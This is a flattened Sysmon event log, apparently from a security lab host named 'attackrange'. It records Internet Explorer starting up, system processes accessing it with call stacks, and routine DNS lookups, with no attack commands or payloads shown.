Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+170f46|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+170f34|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+170f34|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.257{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\iertutil.dll+36dd1|C:\Windows\SYSTEM32\iertutil.dll+36980|C:\Windows\SYSTEM32\iertutil.dll+34bac|C:\Windows\SYSTEM32\iertutil.dll+34f5f|C:\Windows\SYSTEM32\iertutil.dll+48078|C:\Windows\SYSTEM32\IEFRAME.dll+2bb302|C:\Windows\SYSTEM32\IEFRAME.dll+1174d|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.226{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+36911|C:\Windows\SYSTEM32\iertutil.dll+34bac|C:\Windows\SYSTEM32\iertutil.dll+34f5f|C:\Windows\SYSTEM32\iertutil.dll+48078|C:\Windows\SYSTEM32\IEFRAME.dll+2bb302|C:\Windows\SYSTEM32\IEFRAME.dll+1174d|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.137{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6476 CREDAT:82945 /prefetch:2C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=7D930D55986DF5C69CF1A9C2DE7E33B3,SHA256=BEBB0D2229700C6A62B7811985061DC75F6279AB0FF8747C47CCADB6CC2CC462,IMPHASH=E7542C041AAD637F8E6918BBE235A488{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 22542200x800000000000000013243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.168{59A5CD1D-8E56-6005-2E00-00000000A301}246414.128.139.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.944{59A5CD1D-93FA-6005-FC04-00000000A301}3784client.wns.windows.com0type: 5 wns.notify.windows.com.akadns.net;type: 5 emea1.notify.windows.com.akadns.net;type: 5 par02p.wns.notify.trafficmanager.net;::ffff:51.103.5.159;C:\Windows\explorer.exe 10341000x800000000000000013241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.452{59A5CD1D-8E56-6005-2E00-00000000A301}2464159.5.103.51.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.444{59A5CD1D-8E56-6005-2E00-00000000A301}24648.31.126.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000013282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.570{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.570{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 